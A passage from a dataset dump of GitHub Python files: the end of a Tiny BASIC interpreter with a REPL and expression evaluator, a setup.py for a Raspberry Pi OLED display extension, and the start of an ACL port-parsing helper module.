0,\n \"S\": 0,\n \"T\": 0,\n}\n\noperators = [\n [\"==\", \"!=\", \">\", \"<\", \">=\", \"<=\"],\n [\"<<\", \">>\"],\n [\".\"],\n [\"+\", \"-\"],\n [\"*\", \"/\", \"&\", \"|\", \"%\"],\n [\"^\"],\n [\"!\"] + list(math_functions.keys())\n]\n\nconstants = {\n \"PI\": math.pi,\n \"E\": math.e,\n \"TAU\": math.tau,\n}\n\nlines = {}\nmaxLine = 0\nlinePointer = 0\nstopExecution = False\n# change identifiers to be a list of set, in order to call subroutine\nidentifiers = [{}]\nreturnPos = []\nprintReady = True\n\ncommands = [\"\"]\ncurrentCommand = 0\n\ndef clearCommand():\n # clear current line in stdout\n if platform.system() == \"Windows\":\n print(\"\\r\" + ' ' * 64 + \"\\r\", end = \"\", flush = True)\n else:\n print(\"\\x1b[1K\\r\", end = \"\", flush = True)\n print(\"\\>\", end = \" \", flush = True)\n\nkey = {\n \"special\": b'\\xe0' if platform.system() == \"Windows\" else '\\x1b',\n \"enter\": b'\\x0d' if platform.system() == \"Windows\" else '\\x0d',\n \"backspace\": b'\\x08' if platform.system() == \"Windows\" else '\\x7f',\n \"ctrl+d\": b'\\x04' if platform.system() == \"Windows\" else '\\x04',\n \"up\": b'\\xe0H' if platform.system() == \"Windows\" else '\\x1b[A',\n \"down\": b'\\xe0P' if platform.system() == \"Windows\" else '\\x1b[B'\n}\n\n# function to get input command\n# can repeat commands had been executed by up and down arrow\ndef getInput():\n global commands, currentCommand\n ss = \"\"\n while True:\n c = getch()\n if c == key[\"special\"]:\n if platform.system() == \"Windows\": c += getch()\n else: c += getch() + getch()\n if c == key['up']:\n if currentCommand <= 0: continue\n currentCommand -= 1\n if c == key['down']:\n if currentCommand >= len(commands) - 1: continue\n currentCommand += 1\n clearCommand()\n print(commands[currentCommand], end = \"\", flush = True)\n ss = commands[currentCommand]\n elif c == key['enter']:\n print()\n if ss: # if there is a command in ss, return it\n commands.insert(-1, ss.strip())\n currentCommand = len(commands) - 1\n return ss\n else: # if there is no command in ss, return empty string\n return \"\"\n elif c == key['ctrl+d']:\n return \"EXIT\"\n # if c is a back space, delete the last character\n elif c == key['backspace']:\n if ss:\n ss = ss[:-1]\n clearCommand()\n print(ss, end = \"\", 
flush = True)\n        else: # if c is a normal character, add it to ss\n            if platform.system() == \"Windows\": c = c.decode('utf-8')\n            print(c, end = \"\", flush = True)\n            ss = ss + c\n\ndef main():\n    global stopExecution\n    print(f\"Tiny BASIC version {VERSION}\\nby Jeffrey Chen\")\n    print(\"\\n\\n\")\n    while True:\n        try:\n            if printReady:\n                # not a bug fix, just a stylistic preference\n                print(\"\\>\", end = \" \", flush = True)\n            nextLine = getInput()\n            if len(nextLine) > 0:\n                executeTokens(lex(nextLine))\n                # bug fixed: reset stopExecution when a command is done\n                stopExecution = False\n        except KeyboardInterrupt:\n            pass\n        except EOFError:\n            print(\"Bye!\")\n            break\n        except SystemExit:\n            print(\"Bye!\")\n            break\n        except Exception as e: # show traceback when error occurs\n            error_class = e.__class__.__name__ # get the error type\n            detail = e.args[0] # get the error details\n            cl, exc, tb = sys.exc_info() # get the call stack\n            lastCallStack = traceback.extract_tb(tb)[-1] # get the last entry of the call stack\n            fileName = lastCallStack[0] # file where the error occurred\n            lineNum = lastCallStack[1] # line number where the error occurred\n            funcName = lastCallStack[2] # function where the error occurred\n            errMsg = \"File \\\"{}\\\", line {}, in {}: [{}] {}\".format(fileName, lineNum, funcName, error_class, detail)\n            print(\"\\nExecution halted:\\n\"+errMsg)\n\ndef clearLines(): # clear all program lines\n    global lines, maxLine\n    lines = {}\n    maxLine = 0\n\ndef resetExcution(): # reset all variables and registers\n    global identifiers, returnPos, registers\n    identifiers = [{}]\n    returnPos = []\n    registers = {\n        \"A\": 0,\n        \"S\": 0,\n        \"T\": 0,\n    }\n\ndef is_number(s):\n    try:\n        float(s)\n        return True\n    except ValueError:\n        return False\n\ndef getVarType(token):\n    if len(token) > 1:\n        if token[-1] == \"$\":\n            return \"STRING\"\n    return \"NUM\"\n\ndef isValidIdentifier(token):\n    if len(token) == 0:\n        return False\n    if len(token) > 1:\n        if token[-1] == \"$\":\n            token = token[0:-1]\n    if not (token[0].lower() in \"abcdefghijklmnopqrstuvwxyz_\"):\n        return False\n    for c in token[1:]:\n        # bug fixed: token[0].lower() -> c.lower()\n        if not (c.lower() in \"abcdefghijklmnopqrstuvwxyz0123456789_\"):\n            return False\n    return True\n\ndef lex(line):\n    # Split the line into tokens\n    inString = False\n    tokens = []\n    currentToken = \"\"\n    line = line + \" \"\n    for c in line:\n        if not(inString) and c in \" \\\"\":\n            if len(currentToken) != 0:\n                tokens.append([currentToken, \"TBD\"]) # type To Be Determined\n                currentToken = \"\"\n            if c == '\"':\n                inString = True\n        elif inString and c == '\"':\n            tokens.append([currentToken, \"STRING\"])\n            currentToken = \"\"\n            inString = False\n        # to make expressions like \"(1 + 2) * 3\" work,\n        # parentheses don't have to be separated from other tokens by spaces\n        elif not(inString) and c in ['(', ')']:\n            if len(currentToken) != 0:\n                tokens.append([currentToken, \"TBD\"])\n                currentToken = \"\"\n            tokens.append([c, \"PAREN\"]) # parenthesis\n        else:\n            currentToken += c\n\n    # Assign a type to each token\n    for token in tokens:\n        if token[1] != \"TBD\":\n            continue\n        value = token[0]\n        if is_number(value):\n            token[0] = float(token[0])\n            token[1] = \"NUM\" # number\n        elif value.upper() in reserved:\n            token[0] = value.upper()\n            token[1] = \"RESVD\" # reserved word\n        elif value in constants:\n            token[0] = constants[value.upper()]\n            token[1] = \"NUM\" # built-in constant\n        elif value == \"=\":\n            token[1] = \"ASGN\"\n        elif isValidIdentifier(token[0]) and token[0] not in math_functions:\n            token[1] = \"ID\" # identifier\n        else:\n            for operator in operators:\n                if token[0] in operator:\n                    token[1] = 
\"OP\"\n #print(tokens)\n return tokens\n\ndef executeTokens(tokens):\n global lines, maxLine, stopExecution, linePointer, printReady, identifiers, returnPos\n printReady = True\n if tokens[0][1] == \"NUM\":\n lineNumber = int(tokens.pop(0)[0])\n if len(tokens) != 0:\n lines[lineNumber] = tokens\n if lineNumber > maxLine:\n maxLine = lineNumber\n else:\n lines.pop(lineNumber, None)\n return\n if tokens[0][1] != \"RESVD\":\n # bug fixed: stopExecution when run into a non-reserved word\n stopExecution = True\n print(f\"Error: Unknown command {tokens[0]}.\")\n else:\n command = tokens[0][0]\n if command == \"REM\":\n return\n elif command == \"CLS\":\n print(\"\\n\"*500)\n elif command == \"END\":\n stopExecution = True\n elif command == \"EXIT\":\n quit()\n elif command == \"CLEAR\":\n clearLines()\n resetExcution()\n elif command == \"DIR\": # list all the variables and their values in the current scope\n print(identifiers[0])\n elif command == \"LIST\":\n i = 0\n while i <= maxLine:\n if i in lines:\n line = str(i)\n for token in lines[i]:\n tokenVal = \"\"\n if token[1] == \"NUM\":\n tokenVal = getNumberPrintFormat(token[0])\n elif token[1] == \"STRING\":\n tokenVal = f\"\\\"{token[0]}\\\"\"\n else:\n tokenVal = token[0]\n line += \" \" + str(tokenVal)\n print(line)\n i = i + 1\n elif command == \"PRINT\":\n if not(printHandler(tokens[1:])): stopExecution = True\n elif command == \"LET\":\n if not(letHandler(tokens[1:])): stopExecution = True\n elif command == \"INPUT\":\n if not(inputHandler(tokens[1:])): stopExecution = True\n elif command == \"GOTO\":\n if not(gotoHandler(tokens[1:])): stopExecution = True\n elif command == \"IF\":\n if not(ifHandler(tokens[1:])): stopExecution = True\n elif command == \"FOR\":\n if not(forHandler(tokens[1:])): stopExecution = True\n elif command == \"RUN\":\n linePointer = 0\n # bug fixed: clear identifiers before execution\n resetExcution()\n while linePointer <= maxLine:\n if linePointer in lines:\n executeTokens(lines[linePointer])\n if stopExecution:\n stopExecution = False\n break\n linePointer = linePointer + 1\n # bug fixed: clear identifiers after execution\n resetExcution()\n elif command == \"SAVE\":\n if not(saveHandler(tokens[1:])): stopExecution = True\n elif command == \"LOAD\":\n if not(loadHandler(tokens[1:])): stopExecution = True\n elif command == \"GOSUB\":\n if not(gosubHandler(tokens[1:])): stopExecution = True\n elif command == \"RETURN\":\n if len(tokens) != 1:\n print(\"Error: Invalid return command.\")\n stopExecution = True\n if not(returnHandler()): stopExecution = True\n elif command == \"STA\":\n if not(staHandler(tokens[1:])): stopExecution = True\n elif command == \"LDA\":\n if not(ldaHandler(tokens[1:])): stopExecution = True\n elif command == \"STS\":\n if not(stsHandler(tokens[1:])): stopExecution = True\n elif command == \"LDS\":\n if not(ldsHandler(tokens[1:])): stopExecution = True\n elif command == \"STT\":\n if not(sttHandler(tokens[1:])): stopExecution = True\n elif command == \"LDT\":\n if not(ldtHandler(tokens[1:])): stopExecution = True\n\n\ndef getNumberPrintFormat(num):\n if int(num) == float(num):\n return int(num)\n return num\n\ndef saveHandler(tokens):\n global lines, maxLine, printReady\n printReady = True\n if len(tokens) != 1:\n print(\"Error: Invalid arguments.\")\n return False\n if tokens[0][1] != \"STRING\":\n print(\"Error: Invalid filename.\")\n return False\n filename = tokens[0][0]\n # if file extension not specified, add .tb\n if '.' 
not in filename:\n filename = filename + '.tb'\n # if the file already exists, ask the user if he wants to overwrite it\n if os.path.isfile(filename):\n overwrite = input(f\"File {filename} already exists. Overwrite? (y/n)\")\n if overwrite.lower() != \"y\":\n return False\n with open(filename, 'w') as f:\n # basicly copy from \"LIST\" command\n for i in range(maxLine + 1):\n if i in lines:\n line = str(i)\n for token in lines[i]:\n tokenVal = \"\"\n if token[1] == \"NUM\":\n tokenVal = getNumberPrintFormat(token[0])\n elif token[1] == \"STRING\":\n tokenVal = f\"\\\"{token[0]}\\\"\"\n else:\n tokenVal = token[0]\n line += \" \" + str(tokenVal)\n f.write(line + \"\\n\")\n return True\n\ndef loadHandler(tokens):\n global lines, maxLine, printReady\n printReady = True\n if len(tokens) != 1:\n print(\"Error: Invalid arguments.\")\n return False\n if tokens[0][1] != \"STRING\":\n print(\"Error: Invalid filename.\")\n return False\n filename = tokens[0][0]\n # if file extension not specified, add .tb\n if '.' not in filename:\n filename = filename + '.tb'\n try:\n with open(filename, 'r') as f:\n # basicly copy from \"if tokens[0][1] == \"NUM\":\" in executeTokens()\n clearLines()\n for line in f:\n tokens = lex(line.strip())\n if len(tokens) == 0:\n continue\n if tokens[0][1] == \"NUM\":\n lineNumber = int(tokens.pop(0)[0])\n if len(tokens) != 0:\n lines[lineNumber] = tokens\n if lineNumber > maxLine:\n maxLine = lineNumber\n else:\n lines.pop(lineNumber, None)\n else:\n print(\"Error: Invalid line number.\")\n return False\n except FileNotFoundError:\n print(\"Error: File not found.\")\n return False\n return True\n\ndef gotoHandler(tokens):\n global linePointer\n if len(tokens) == 0:\n print(\"Error: Expected expression.\")\n return\n newNumber = solveExpression(tokens, 0)\n if newNumber[1] != \"NUM\":\n print(\"Error: Line number expected.\")\n else:\n linePointer = newNumber[0] - 1\n return True\n\ndef gosubHandler(tokens):\n global linePointer, identifiers, returnPos\n if len(tokens) == 0:\n print(\"Error: Expected expression.\")\n return\n newNumber = solveExpression(tokens, 0)\n if newNumber[1] != \"NUM\":\n print(\"Error: Line number expected.\")\n else:\n returnPos.insert(0, linePointer) # push current line number to stack\n identifiers.insert(0, {}) # variable scope for subroutine\n linePointer = newNumber[0] - 1 # jump to subroutine\n return True\n\ndef returnHandler():\n global linePointer, identifiers, returnPos\n if len(returnPos) == 0:\n print(\"Error: Not in a subroutine.\")\n return\n linePointer = returnPos.pop(0) # pop current line number from stack\n identifiers.pop(0)\n return True\n\ndef inputHandler(tokens):\n varName = None\n if len(tokens) == 0:\n print(\"Error: Expected identifier.\")\n return\n elif len(tokens) == 1 and tokens[0][1] == \"ID\":\n varName = tokens[0][0]\n else:\n varName = solveExpression(tokens, 0)[0]\n if not(isValidIdentifier(varName)):\n print(f\"Error: {varName} is not a valid identifier.\")\n return\n while True:\n print(\"?\", end = '')\n varValue = input()\n if getVarType(varName) == \"STRING\":\n identifiers[0][varName] = [varValue, \"STRING\"]\n break\n else:\n if is_number(varValue):\n # bug fixed: varValue -> float(varValue)\n identifiers[0][varName] = [float(varValue), \"NUM\"] \n break\n else:\n print(\"Try again.\")\n return True\n\ndef ifHandler(tokens):\n thenPos = elsePos = None\n for i in range(0, len(tokens)):\n if tokens[i] == [\"THEN\", \"RESVD\"]: # THEN is change to be a reserved word\n thenPos = i\n break\n for i in range(0, 
len(tokens)): # find the position of \"ELSE\"\n if tokens[i] == [\"ELSE\", \"RESVD\"]:\n elsePos = i\n break\n # if \"THEN\" is not found or \"ELSE\" is found before \"THEN\"\n if thenPos == None or (elsePos and thenPos > elsePos): \n print(\"Error: Malformed IF statement.\")\n return\n exprValue = solveExpression(tokens[0:thenPos], 0)\n if exprValue == None:\n return\n elif exprValue[0] != 0:\n if len(tokens[thenPos+1:elsePos]) == 0:\n print(\"Error: Malformed IF statement.\")\n return \n executeTokens(tokens[thenPos+1:elsePos])\n # if \"ELSE\" is found, and exprValue is False\n # execute the expression after \"ELSE\"\n elif elsePos: \n if len(tokens[elsePos+1:]) == 0:\n print(\"Error: Malformed IF statement.\")\n return\n executeTokens(tokens[elsePos+1:])\n return True\n\ndef forHandler(tokens):\n global identifiers\n toPos = doPos = None\n # find the position of \"TO\" and \"DO\"\n for i in range(0, len(tokens)):\n if tokens[i] == [\"TO\", \"RESVD\"]:\n toPos = i\n break\n for i in range(0, len(tokens)):\n if tokens[i] == [\"DO\", \"RESVD\"]:\n doPos = i\n break\n if toPos == None or doPos == None or toPos > doPos:\n print(\"Error: Malformed FOR statement.\")\n return \n # get a copy of iterator variable\n iterVar = None\n if getIdentifierValue(tokens[0][0]) != None:\n iterVar = getIdentifierValue(tokens[0][0])\n # set the iterator to the first value\n executeTokens([[\"LET\", \"RESVD\"]] + tokens[0:toPos])\n # calculate the end value\n endValue = solveExpression(tokens[toPos+1:doPos], 0)\n if endValue == None:\n return\n if endValue[1] != \"NUM\":\n print(\"Error: Expected number.\")\n return\n endValue = endValue[0]\n # execute the FOR statement\n while getIdentifierValue(tokens[0][0])[0] <= endValue:\n executeTokens(tokens[doPos+1:])\n tokens[toPos - 1][0] += 1\n executeTokens([[\"LET\", \"RESVD\"]] + tokens[0:toPos])\n # restore the iterator variable\n if iterVar != None:\n executeTokens([[\"LET\", \"RESVD\"]] + tokens[0:toPos - 1] + [iterVar])\n return True\n\ndef letHandler(tokens):\n varName = None\n varValue = None\n eqPos = None\n for i in range(0, len(tokens)):\n if tokens[i][1] == \"ASGN\":\n eqPos = i\n break\n if eqPos == None:\n print(\"Error: Malformed LET statement.\")\n return\n if eqPos == 1 and tokens[0][1] == \"ID\":\n varName = tokens[0][0]\n else:\n if len(tokens[0:i]) == 0:\n print(\"Error: Expected identifier.\")\n return\n varName = solveExpression(tokens[0:i], 0)\n if varName == None:\n stopExecution = True\n return\n varName = varName[0]\n if not(isValidIdentifier(varName)):\n print(f\"Error: {varName} is not a valid identifier.\")\n return\n if len(tokens[i+1:]) == 0:\n print(\"Error: Expected expression.\")\n return\n varValue = solveExpression(tokens[i+1:], 0)\n if varValue == None:\n return\n if getVarType(varName) != varValue[1]:\n print(f\"Error: Variable {varName} type mismatch.\")\n return\n identifiers[0][varName] = varValue\n return True\n\ndef printHandler(tokens):\n if len(tokens) == 0:\n print(\"Error: Expected identifier.\")\n return\n exprRes = solveExpression(tokens, 0)\n if exprRes == None:\n return\n # bug fixed: print out a number will cause it convert to int\n value = exprRes[0]\n if exprRes[1] == \"NUM\":\n value = getNumberPrintFormat(value)\n print(value)\n return True\n\n# store number to rigister A\ndef staHandler(tokens):\n global registers\n if len(tokens) == 0:\n print(\"Error: Expected identifier.\")\n return\n exprRes = solveExpression(tokens, 0)\n if exprRes == None:\n return\n if exprRes[1] != \"NUM\":\n print(\"Error: Rigister 
A expected number.\")\n return\n registers[\"A\"] = exprRes[0]\n return True\n\ndef stsHandler(tokens):\n global registers\n if len(tokens) == 0:\n print(\"Error: Expected identifier.\")\n return\n exprRes = solveExpression(tokens, 0)\n if exprRes == None:\n return\n if exprRes[1] != \"NUM\":\n print(\"Error: Rigister A expected number.\")\n return\n registers[\"S\"] = exprRes[0]\n return True\n\ndef sttHandler(tokens):\n global registers\n if len(tokens) == 0:\n print(\"Error: Expected identifier.\")\n return\n exprRes = solveExpression(tokens, 0)\n if exprRes == None:\n return\n if exprRes[1] != \"NUM\":\n print(\"Error: Rigister A expected number.\")\n return\n registers[\"T\"] = exprRes[0]\n return True\n\n# load number from rigister A\ndef ldaHandler(tokens):\n global registers\n varName = None\n if len(tokens) == 0:\n print(\"Error: Expected identifier.\")\n return\n elif len(tokens) == 1 and tokens[0][1] == \"ID\":\n varName = tokens[0][0]\n else:\n varName = solveExpression(tokens, 0)[0]\n if not(isValidIdentifier(varName)):\n print(f\"Error: {varName} is not a valid identifier.\")\n return\n if getVarType(varName) != \"NUM\":\n print(f\"Error: Variable {varName} is not a number.\")\n return\n executeTokens([[\"LET\", \"RESVD\"], [varName, \"ID\"], [\"=\", \"ASGN\"], [registers[\"A\"], \"NUM\"]])\n return True\n\ndef ldsHandler(tokens):\n global registers\n varName = None\n if len(tokens) == 0:\n print(\"Error: Expected identifier.\")\n return\n elif len(tokens) == 1 and tokens[0][1] == \"ID\":\n varName = tokens[0][0]\n else:\n varName = solveExpression(tokens, 0)[0]\n if not(isValidIdentifier(varName)):\n print(f\"Error: {varName} is not a valid identifier.\")\n return\n if getVarType(varName) != \"NUM\":\n print(f\"Error: Variable {varName} is not a number.\")\n return\n executeTokens([[\"LET\", \"RESVD\"], [varName, \"ID\"], [\"=\", \"ASGN\"], [registers[\"S\"], \"NUM\"]])\n return True\n\ndef ldtHandler(tokens):\n global registers\n varName = None\n if len(tokens) == 0:\n print(\"Error: Expected identifier.\")\n return\n elif len(tokens) == 1 and tokens[0][1] == \"ID\":\n varName = tokens[0][0]\n else:\n varName = solveExpression(tokens, 0)[0]\n if not(isValidIdentifier(varName)):\n print(f\"Error: {varName} is not a valid identifier.\")\n return\n if getVarType(varName) != \"NUM\":\n print(f\"Error: Variable {varName} is not a number.\")\n return\n executeTokens([[\"LET\", \"RESVD\"], [varName, \"ID\"], [\"=\", \"ASGN\"], [registers[\"T\"], \"NUM\"]])\n return True\n\ndef getIdentifierValue(name):\n try:\n return identifiers[0][name].copy()\n except KeyError:\n return None\n\ndef solveExpression(tokens, level):\n leftSideValues = []\n rightSideValues = []\n if level < len(operators):\n i = 0\n while i < len(tokens):\n if not(tokens[i][1] in [\"OP\", \"NUM\", \"STRING\", \"ID\", 'PAREN']):\n print(f\"Error: Unknown operand {tokens[i][0]}\")\n return None\n elif tokens[i][1] == \"PAREN\":\n # find the matching close parentheses\n close = findMatchingClose(tokens, i)\n if close == None:\n print(\"Error: Unmatched parentheses.\")\n return None\n # solve the expression inside the parentheses\n subExpr = solveExpression(tokens[i+1:close], 0)\n if subExpr == None:\n return None\n leftSideValues.append(subExpr)\n # continue to the next token\n i = close\n elif tokens[i][1] == \"OP\" and tokens[i][0] in operators[level]:\n exprResL = None\n exprResR = None\n if len(leftSideValues) != 0:\n exprResL = solveExpression(leftSideValues, level)\n rightSideValues = tokens[i+1:]\n if 
len(rightSideValues) != 0:\n exprResR = solveExpression(rightSideValues, level)\n \n if tokens[i][0] == \"+\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n elif exprResL[1] == \"NUM\" and exprResR[1] == \"NUM\":\n return [exprResL[0] + exprResR[0], \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None\n elif tokens[i][0] == \"-\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n elif exprResL[1] == \"NUM\" and exprResR[1] == \"NUM\":\n return [exprResL[0] - exprResR[0], \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None\n elif tokens[i][0] == \"/\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n elif exprResL[1] == \"NUM\" and exprResR[1] == \"NUM\":\n return [exprResL[0] / exprResR[0], \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None \n elif tokens[i][0] == \"*\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n elif exprResL[1] == \"NUM\" and exprResR[1] == \"NUM\":\n return [exprResL[0] * exprResR[0], \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None \n elif tokens[i][0] == \"^\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n elif exprResL[1] == \"NUM\" and exprResR[1] == \"NUM\":\n return [exprResL[0] ** exprResR[0], \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None\n elif tokens[i][0] == \"%\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n elif exprResL[1] == \"NUM\" and exprResR[1] == \"NUM\":\n return [exprResL[0] % exprResR[0], \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None\n elif tokens[i][0] == \"==\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n else:\n return [exprResL[0] == exprResR[0], \"NUM\"]\n elif tokens[i][0] == \"!=\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n else:\n return [exprResL[0] != exprResR[0], \"NUM\"]\n elif tokens[i][0] == \"<=\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n else:\n return [exprResL[0] <= exprResR[0], \"NUM\"]\n elif tokens[i][0] == \"<\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n else:\n return [exprResL[0] < exprResR[0], \"NUM\"]\n elif tokens[i][0] == \">\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n else:\n return [exprResL[0] > exprResR[0], \"NUM\"]\n elif tokens[i][0] == \">=\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n else:\n return [exprResL[0] >= exprResR[0], \"NUM\"]\n # operator <<\n elif tokens[i][0] == \"<<\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n if exprResL[1] != \"NUM\" or exprResR[1] != \"NUM\":\n print(\"Error: Operand type mismatch.\")\n return None\n if int(exprResL[0]) != exprResL[0] or int(exprResR[0]) != exprResR[0]:\n print(\"Error: Operand type mismatch.\")\n return None\n return [float(int(exprResL[0]) << int(exprResR[0])), \"NUM\"]\n # operator >>\n elif tokens[i][0] == \">>\":\n if exprResL == None or exprResR == None:\n 
print(\"Error: Operator expects value.\")\n return None\n if exprResL[1] != \"NUM\" or exprResR[1] != \"NUM\":\n print(\"Error: Operand type mismatch.\")\n return None\n if int(exprResL[0]) != exprResL[0] or int(exprResR[0]) != exprResR[0]:\n print(\"Error: Operand type mismatch.\")\n return None\n return [float(int(exprResL[0]) >> int(exprResR[0])), \"NUM\"]\n elif tokens[i][0] == \"&\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n elif exprResL[1] == \"NUM\" and exprResR[1] == \"NUM\":\n return [(exprResL[0]) and (exprResR[0]), \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None\n elif tokens[i][0] == \"|\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n elif exprResL[1] == \"NUM\" and exprResR[1] == \"NUM\":\n return [(exprResL[0]) or (exprResR[0]), \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None\n elif tokens[i][0] == \".\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n else:\n value1 = exprResL[0]\n if exprResL[1] == \"NUM\":\n value1 = str(getNumberPrintFormat(value1))\n value2 = exprResR[0]\n if exprResR[1] == \"NUM\":\n value2 = str(getNumberPrintFormat(value2))\n return [value1 + value2, \"STRING\"]\n # operator !\n elif tokens[i][0] == \"!\":\n # as an unary operator, ! only takes one argument\n if exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n if exprResL != None:\n print(\"Error: ! is an unary operator.\")\n return None\n if exprResR[1] == \"NUM\":\n return [not exprResR[0], \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None\n # math function also handle as a unary operator\n elif tokens[i][0] in math_functions:\n if exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n if exprResL != None:\n print(\"Error: Function is unary operator.\")\n return None\n if exprResR[1] == \"NUM\":\n return [math_functions[tokens[i][0]](exprResR[0]), \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None\n else:\n leftSideValues.append(tokens[i])\n i += 1\n return solveExpression(leftSideValues, level + 1)\n else:\n if len(tokens) > 1:\n print(\"Error: Operator expected.\")\n return None\n elif tokens[0][1] == \"ID\":\n if tokens[0][0] in identifiers[0]:\n return getIdentifierValue(tokens[0][0])\n else:\n print(f\"Error: Variable {tokens[0][0]} not initialized.\")\n return None\n return tokens[0]\n\ndef findMatchingClose(tokens, openIndex):\n openCount = 1\n for i in range(openIndex + 1, len(tokens)):\n if tokens[i][0] == \"(\":\n openCount += 1\n elif tokens[i][0] == \")\":\n openCount -= 1\n if openCount == 0:\n return i\n return None\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jeff082chen/tinybasic","sub_path":"tb.py","file_name":"tb.py","file_ext":"py","file_size_in_byte":34807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6123364259","text":"from distutils.core import setup, Extension\nimport numpy\nfrom rpi import is_raspberry_pi\n\nif is_raspberry_pi():\n module = Extension(\n 'liboled',\n sources=[\n 'oled/liboled.c',\n 'oled/ssd1331.c',\n ],\n include_dirs=[\"oled\", numpy.get_include()],\n extra_compile_args=[\"-Ofast\", \"-march=native\"],\n libraries=['bcm2835'],\n )\nelse:\n module = Extension(\n 'liboled',\n sources=[\n 'oled/liboled.c',\n 'oled/ssd1331.c',\n ],\n include_dirs=[\"oled\", 
\"oled/mocks\", numpy.get_include()],\n extra_compile_args=[\"-Ofast\", \"-march=native\"],\n )\n\nsetup(\n name='oled',\n version='0.1.0',\n description='Python wrapper for controlling an SSD1331 OLED display from a Raspberry Pi',\n author='Erasmus Cedernaes',\n author_email='erasmus.cedernaes@gmail.com',\n url='https://github.com/emanuelen5/rpi-led-server/',\n long_description='Python wrapper for controlling an OLED display',\n ext_modules=[module]\n)\n","repo_name":"emanuelen5/rpi-led-server","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22752527249","text":"import logging\nimport socket\nimport ipaddress\nfrom . import prefixlist\n\n\ndef get_acls(yaml):\n \"\"\"Return a list of all acls.\"\"\"\n ret = []\n if \"acls\" in yaml:\n for aclname, _acl in yaml[\"acls\"].items():\n ret.append(aclname)\n return ret\n\n\ndef get_by_name(yaml, aclname):\n \"\"\"Return the acl by name, if it exists. Return None otherwise.\"\"\"\n try:\n if aclname in yaml[\"acls\"]:\n return aclname, yaml[\"acls\"][aclname]\n except KeyError:\n pass\n return None, None\n\n\ndef hydrate_term(acl_term):\n \"\"\"Adds all defaults to an ACL term\"\"\"\n\n if \"family\" not in acl_term:\n acl_term[\"family\"] = \"any\"\n if \"source\" not in acl_term:\n acl_term[\"source\"] = \"any\"\n if \"destination\" not in acl_term:\n acl_term[\"destination\"] = \"any\"\n\n if \"protocol\" not in acl_term or acl_term[\"protocol\"] == \"any\":\n acl_term[\"protocol\"] = 0\n\n if \"source-port\" not in acl_term:\n acl_term[\"source-port\"] = \"any\"\n if \"destination-port\" not in acl_term:\n acl_term[\"destination-port\"] = \"any\"\n if \"icmp-code\" not in acl_term:\n acl_term[\"icmp-code\"] = \"any\"\n if \"icmp-type\" not in acl_term:\n acl_term[\"icmp-type\"] = \"any\"\n\n return acl_term\n\n\ndef get_icmp_low_high(icmpstring):\n \"\"\"For a given icmp string, which can be either an integer or a range of\n integers including start/stop being omitted, eg 0-255, 10- or -10, or the\n string \"any\", return a tuple of (lowport, highport) or (None, None) upon\n error\"\"\"\n if isinstance(icmpstring, int):\n return int(icmpstring), int(icmpstring)\n if \"any\" == icmpstring:\n return 0, 255\n\n try:\n icmp = int(icmpstring)\n if icmp > 0:\n return icmp, icmp\n except:\n pass\n\n if icmpstring.startswith(\"-\"):\n icmp = int(icmpstring[1:])\n return 0, icmp\n\n if icmpstring.endswith(\"-\"):\n icmp = int(icmpstring[:-1])\n return icmp, 255\n\n try:\n icmps = icmpstring.split(\"-\")\n return int(icmps[0]), int(icmps[1])\n except:\n pass\n\n return None, None\n\n\ndef get_port_low_high(portstring):\n \"\"\"For a given port string, which can be either an integer, a symbolic port name\n in /etc/services, a range of integers including start/stop being omitted, eg\n 0-65535, 1024- or -1024, or the string \"any\", return a tuple of\n (lowport, highport) or (None, None) upon error\"\"\"\n if isinstance(portstring, int):\n return int(portstring), int(portstring)\n if \"any\" == portstring:\n return 0, 65535\n\n try:\n port = int(portstring)\n if port > 0:\n return port, port\n except:\n pass\n\n try:\n port = socket.getservbyname(portstring)\n return port, port\n except:\n pass\n\n if portstring.startswith(\"-\"):\n port = int(portstring[1:])\n return 0, port\n\n if portstring.endswith(\"-\"):\n port = int(portstring[:-1])\n return port, 65535\n\n try:\n ports = portstring.split(\"-\")\n 
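# Editor's note: worked examples of the fall-through above: \"443\" -> (443, 443);\n        # \"https\" -> (443, 443) via getservbyname; \"-1024\" -> (0, 1024); \"1024-\" -> (1024, 65535);\n        # a dashed range such as \"8000-8080\" is split right here into (8000, 8080).\n        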
